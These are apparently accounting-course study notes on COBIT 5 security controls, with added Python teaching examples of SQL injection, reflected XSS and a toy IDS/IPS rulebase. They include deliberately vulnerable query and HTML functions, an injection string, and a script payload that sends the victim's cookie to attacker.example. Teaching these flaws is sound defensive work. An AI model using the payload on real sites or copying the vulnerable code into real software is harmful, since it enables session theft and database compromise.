organization’s network
- COBIT 5 management practice DSS05.03 describes the activities involved in managing endpoint security.
- Three areas deserve special attention:
(1) endpoint configuration
- Default configurations of most devices typically turn on a large number of optional settings that are
seldom, if ever, used.
- default installations of many operating systems turn on many special-purpose programs, called
services, that are not essential
- vulnerabilities – flaws in programs or configurations that can be exploited to crash the system or take
control of it.
- vulnerability scanners – automated tools that examine a system for known weaknesses: unpatched software,
insecure configuration settings, and unused or unnecessary programs and services that represent
potential security threats.
- hardening – the process of modifying the default configuration of endpoints to eliminate unnecessary
settings and services.
- Every endpoint needs to be running antivirus and firewall software that is regularly updated.
(2) user account management
- COBIT 5 management practice DSS05.04 stresses the need to carefully manage all user accounts,
especially those accounts that have unlimited (administrative) rights on that computer.
- Administrative rights are needed in order to install software and alter most configuration settings.
- Therefore, employees who need administrative powers on a particular computer should be assigned two
accounts:
1. has administrative rights - only when they need to perform some action, such as installing new
software, which requires administrative rights
2. has only limited privileges - to perform routine daily duties
- change the default passwords on all administrative accounts that are created during initial installation of
any software or hardware because those account names and their default passwords are publicly available
on the Internet
(3) software design.
 Buffer overflows, SQL injection, and cross-site scripting are common examples of attacks against the
software running on websites.
 Buffer overflow attacks exploit software that does not check the size of user-supplied input before
copying it into a fixed-size memory buffer. Input larger than the buffer overwrites adjacent memory, and
an attacker who places carefully crafted data in the excess can redirect execution and take control of
the machine.
 SQL injection attacks occur whenever web application software that interfaces with a database server
does not properly handle user input, permitting an attacker to embed SQL commands within a data entry
request and have those commands executed on the database server.
 Cross-site scripting attacks occur when web application software does not carefully filter or encode
user input before returning any of that data to the browser, in which case the victim's browser executes
any embedded malicious script.
 The common theme in these attacks is failure to validate and "scrub" user input so that it is treated as
data rather than as code.
 Section BAI03 of the COBIT 5 framework specifies the need to design security into all new applications.
 Section APO10 prescribes best practices for managing the risks associated with purchasing software.
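Worked example, added to these notes (not from the original page or textbook), showing two of the input-handling failures above as the vulnerable form beside the fixed form: a SQL query assembled by string concatenation versus a parameterized query, and user input echoed into HTML unescaped versus escaped. The table, its rows, the injection string and the script payload are constructed, and an in-memory sqlite3 database stands in for the database server.

```python
"""SQL injection and reflected XSS: vulnerable versus fixed.

Added example for these notes; table, rows and inputs are constructed.
Standard library only.
"""
import html
import sqlite3

DB = sqlite3.connect(":memory:")
DB.executescript("""
    CREATE TABLE users (username TEXT, password_hash TEXT, is_admin INTEGER);
    INSERT INTO users VALUES ('alice', 'h1', 0), ('bob', 'h2', 0), ('root', 'h3', 1);
""")


def find_user_vulnerable(username):
    """User input is spliced straight into the SQL text, so the input can
    change the structure of the statement (SQL injection)."""
    sql = "SELECT username FROM users WHERE username = '" + username + "'"
    return [row[0] for row in DB.execute(sql)]


def find_user_fixed(username):
    """The statement text is fixed; the driver passes the value separately
    as a bound parameter, so quotes in the input are just data."""
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in DB.execute(sql, (username,))]


def greeting_vulnerable(name):
    """Reflects user input into the page unchanged: a <script> tag in the
    input becomes a script the victim's browser runs (reflected XSS)."""
    return "<p>Hello, " + name + "</p>"


def greeting_fixed(name):
    """html.escape turns <, >, &, and quotes into entities, so the browser
    renders the input as text rather than as markup."""
    return "<p>Hello, " + html.escape(name, quote=True) + "</p>"


INJECTION = "x' OR '1'='1"
XSS = "<script>document.location='https://attacker.example/?c='+document.cookie</script>"

if __name__ == "__main__":
    print(find_user_vulnerable(INJECTION))   # every user: the WHERE clause became always-true
    print(find_user_fixed(INJECTION))        # []: nobody is literally named x' OR '1'='1
    print(greeting_vulnerable(XSS))
    print(greeting_fixed(XSS))
```

Neither fix "filters out bad characters": the parameterized query and the HTML escaping keep the input as data in its respective context, which is the stronger form of the scrubbing the notes describe.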
IT SOLUTIONS: ENCRYPTION
 Encryption provides a final layer of defense to prevent unauthorized access to sensitive information.
 It supports the security principles of protecting the confidentiality of organizational information and the
privacy of personal information collected from customers, employees, and business partners.

Physical Security: Access Controls


 A skilled attacker needs only a few minutes of unsupervised physical access to bypass the other information
security controls, for example by installing a keystroke logging device that captures a user's authentication
credentials.
 Someone with unsupervised physical access could also insert a special "boot" disk that provides direct access
to every file on the computer and then copy sensitive files to a portable device, or could simply remove the
hard drive or steal the entire computer.
 COBIT 5 management practice DSS05.05 describes best practices regarding physical access control
 Physical access control begins with entry points to the building itself
- Ideally, only one regular entry point that remains unlocked during normal office hours.
- emergency exits should be connected to an alarm system that is automatically triggered
- a security guard should be stationed at the main entrance to verify the identity of employees.
- Visitors should be required to sign in and be escorted by an employee wherever they go in the building.
- physical access to rooms should be securely locked and all entry/exit monitored by closed-circuit
television systems.
- Access to the wiring used in the organization’s LANs also needs to be restricted in order to prevent
wiretapping
 Ideally, employees should not store any sensitive information on laptops or other personal devices or it
should be encrypted so that if the device is lost or stolen the information will be inaccessible.
 COBIT 5 management practice DSS05.06 stresses the importance of also restricting physical access to
network printers, because they often store document images on their hard drives.
 especially promising way to achieve defense-in-depth is to integrate physical and remote access control systems.

CHANGE CONTROLS AND CHANGE MANAGEMENT


 Change control and change management - The formal process used to ensure that modifications to
hardware, software, or processes do not reduce systems reliability.
o often results in better operating performance because there are fewer problems to fix
o organizations with good change control experience lower costs when security incidents do happen
o one of the most important characteristics that distinguish top-performing organizations from all others.
o two of COBIT 5’s key processes deal with:
1. managing change (BAI06)
2. procedures for testing and transitioning to new solutions (BAI07).
o Characteristics of a well-designed change control and change management process include:
 Documentation of all change requests, identifying the nature of the change, its rationale,
date of the request, and outcome of the request.
 Documented approval of all change requests by appropriate levels of management.
- important that senior management review and approve major changes to processes and
systems in order to ensure that the proposed change is consistent with the organization’s
long-term strategic plans.
 Testing of all changes in a separate system, not the one used for daily business processes.
- This reduces the risk that “bugs” in modifications disrupt normal business.
 Conversion controls to ensure that data is accurately and completely transferred from the
old to the new system.
- Internal auditors should review the conversion process.
 Updating of all documentation (program instructions, system descriptions, procedures manuals,
etc.) to reflect the newly implemented changes.
 A special process for timely review, approval, and documentation of “emergency changes” as
soon after the crisis as is practical.
- All emergency changes need to be logged to provide an audit trail.
- A large number or marked increase in the number of emergency changes is a potential red
flag of other problems (poor configuration management procedures, lack of preventive
maintenance, or political “game-playing” to avoid the normal change control process).
 Development and documentation of “backout” plans to facilitate reverting to previous
configurations if the new change creates unexpected problems.
 Careful monitoring and review of user rights and privileges during the change process to
ensure that proper segregation of duties is maintained.
DETECTIVE CONTROLS
- COBIT 5 management practice DSS05.07 describes the activities that organizations need to perform to enable
timely detection of intrusions and problems
- four types of detective controls:
1) Log Analysis - process of examining logs to identify evidence of possible attacks.
- logs form an audit trail of system access and those logs are of value only if they are routinely
examined.
- Logs need to be analyzed regularly to detect problems in a timely manner
- Problems: logs can quickly grow in size, and many devices produce logs with proprietary formats, making it
hard to correlate and summarize logs from different devices.
- log analysis ultimately requires human judgment to interpret the reports and identify situations
that are not “normal.”

2) Intrusion Detection Systems (IDS) - A system that creates logs of all network traffic that was permitted to
pass the firewall and then analyzes those logs for signs of attempted or successful intrusions
o Network IDSs consist of a set of sensors and a central monitoring unit that create logs of network traffic
that was permitted to pass the firewall and then analyze those logs for signs of attempted or successful
intrusions.
- functions by comparing observed traffic to its rulebase
- main difference between an IDS and an IPS:
 IDS - only produces a warning alert when it detects a suspicious pattern of network traffic; it is then up to
the human responsible for monitoring the IDS to decide what course of action to take.
 IPS - not only issues an alert but also automatically takes steps to stop a suspected attack.
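As an added example (not from the textbook or these notes), the Python below is a toy sensor that compares each traffic record to a small rulebase, as the notes describe. The same class runs in "IDS" mode, where a match only produces an alert for a human to act on, and in "IPS" mode, where a match also blocks the source so its later traffic is dropped. The five traffic records, the three rules and the addresses are constructed for the example; a real rulebase is far larger and is applied to packet streams rather than to these simplified records.

```python
import re

# Constructed traffic records, as a sensor might receive them after the firewall permitted them.
SAMPLE_TRAFFIC = [
    {"src": "10.0.0.5",     "dst": "10.0.1.20", "dport": 443, "payload": "GET /index.html"},
    {"src": "198.51.100.7", "dst": "10.0.1.20", "dport": 80,  "payload": "GET /login?user=' OR '1'='1"},
    {"src": "198.51.100.7", "dst": "10.0.1.20", "dport": 22,  "payload": ""},
    {"src": "198.51.100.7", "dst": "10.0.1.21", "dport": 22,  "payload": ""},
    {"src": "10.0.0.9",     "dst": "10.0.1.20", "dport": 80,  "payload": "GET /report?q=<script>alert(1)</script>"},
]

# Toy rulebase: (rule name, predicate over one record). Internal addresses are assumed to be 10.x.
RULEBASE = [
    ("sqli-quote-or", lambda r: re.search(r"'\s*or\s*'", r["payload"], re.I) is not None),
    ("xss-script-tag", lambda r: "<script" in r["payload"].lower()),
    ("ssh-from-outside", lambda r: r["dport"] == 22 and not r["src"].startswith("10.")),
]


class Sensor:
    """Rule-matching sensor. mode="IDS" alerts only; mode="IPS" alerts and blocks."""

    def __init__(self, mode):
        if mode not in ("IDS", "IPS"):
            raise ValueError("mode must be 'IDS' or 'IPS'")
        self.mode = mode
        self.alerts = []      # (rule name, source) pairs for the human monitor
        self.blocked = set()  # sources an IPS has stopped; always empty for an IDS

    def inspect(self, record):
        """Compare one record to the rulebase and return the verdict for it."""
        if record["src"] in self.blocked:
            return "dropped"          # IPS already acted on this source
        for name, matches in RULEBASE:
            if matches(record):
                self.alerts.append((name, record["src"]))
                if self.mode == "IPS":
                    self.blocked.add(record["src"])
                    return "blocked"  # alert plus automatic action
                return "alert"        # alert only; a person decides what to do
        return "allowed"

    def run(self, records):
        """Inspect records in order and return the list of verdicts."""
        return [self.inspect(r) for r in records]


if __name__ == "__main__":
    for mode in ("IDS", "IPS"):
        sensor = Sensor(mode)
        print(mode, sensor.run(SAMPLE_TRAFFIC), sorted(sensor.blocked))
```

The IDS run leaves every record flowing and hands four alerts to the monitoring staff; the IPS run blocks the source at its first match, so the two later SSH attempts from that source are dropped before the rulebase is consulted and produce no further alerts.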

3) Penetration Testing -
- COBIT 5 control processes MEA01 and MEA02 state the need to periodically test the effectiveness of
business processes and internal controls (including security procedures).
- penetration test - An authorized attempt to break into the organization’s information system
- provides a more rigorous way to test the effectiveness of an organization’s information security.

4) Continuous Monitoring
- COBIT 5 management practice APO01.08 stresses the importance of continuously monitoring both
employee compliance with the organization’s information security policies and overall performance of
business processes.
- effectively monitoring performance requires judgment and skill

CORRECTIVE CONTROLS
- As COBIT 5 management practice MEA01.05 explains, organizations also need procedures to undertake timely
corrective actions.
- Many corrective controls rely on human judgment
- effectiveness depends to a great extent on proper planning and preparation.
- COBIT 5 devotes two sections to the entire process:
1. managing and responding to incidents (DSS02)
2. managing problems (DSS03).
- three particularly important corrective controls:
1. Computer Incident Response Team (CIRT) - A team that is responsible for dealing with major security
incidents.
- should include not only technical specialists but also senior
operations management
- CIRT should lead the organization’s incident response process through the following four steps:
(1) Recognition that a problem exists.
- Typically occurs when an IPS or IDS signals an alert, but it can also be the result of log
analysis by a systems administrator.
(2) Containment of the problem.
- Once an intrusion is detected, prompt action is needed to stop it and to contain the damage.
(3) Recovery.
- Damage caused by the attack must be repaired.
- may involve restoring data from backup and reinstalling corrupted programs
(4) Follow-up.
- Once recovery is in process, the CIRT should lead the analysis of how the incident occurred.
- it needs to immediately involve forensic experts to ensure that all possible evidence is
collected and maintained in a manner that makes it admissible for use in court.
- Communication is vital throughout all four steps in the incident response process.
- multiple methods of notifying members of the CIRT are necessary
- important to practice the incident response plan, including the alert process.
- It is much better to discover a gap in the plan during a practice run than when a real incident occurs.
- Regular practice helps identify the need for change in response to technological changes.
2. Chief Information Security Officer (CISO)
- CISO - independent of other information systems functions and should report to either the chief
operating officer (COO) or the chief executive officer (CEO).
- must understand the company’s technology environment and work with the chief information officer
(CIO) to design, implement, and promote sound security policies and procedures.
- an impartial assessor and evaluator of the IT environment.
- have responsibility for ensuring that vulnerability and risk assessments are performed regularly and
that security audits are
- to work closely with the person in charge of physical security, because unauthorized physical access can
allow an intruder to bypass the most elaborate logical access controls
3. Patch Management
- exploit - A program designed to take advantage of a known vulnerability.
- patch - Code released by software developers that fixes a particular vulnerability
- sometimes create new problems because of unanticipated side effects.
- patch management - The process of regularly applying patches and updates to software.
- Fix known vulnerabilities by installing the latest updates
 Security programs, operating systems, application programs

SECURITY IMPLICATIONS OF VIRTUALIZATION AND THE CLOUD


 virtualization - Running multiple systems simultaneously on one physical computer.
 cloud computing - Using a browser to remotely access software applications (software as a service), data
storage devices (storage as a service), hardware (infrastructure as a service), and entire application
environments (platform as a service).
- referred to as a “private,” “public,” or “hybrid” cloud depending upon whether the remotely
accessed resources are entirely owned by the organization, a third party, or a mix of the two,
respectively
- advantages: reducing costs and improving flexibility
- the centralization of computing resources with cloud computing (whether public, private, or hybrid)
makes it easier to change software and hardware
- public clouds are accessible via the Internet, so the authentication process is the primary means of
protecting your data stored in the cloud from unauthorized access.
- public clouds also raise concerns about the other aspects of systems reliability (confidentiality,
privacy, processing integrity, and availability) because the organization is outsourcing control of its
data and computing resources to a third party.
 Type 2 SOC 2 report describes the controls used by a service provider (e.g., a cloud provider, payroll service,
etc.) and a CPA’s opinion about the operating effectiveness of those controls
 Virtual firewalls, IPS, and IDS need to be deployed both by cloud providers, to isolate virtual machines and
cloud customers from one another, and by organizations to properly restrict employee access to only those
portions of the system necessary to perform their assigned jobs
 virtualization and cloud computing can have either positive or negative effects on the overall level of
information security, depending upon how well the organization or the cloud provider implements the various
layers of preventive, detective, and corrective controls.
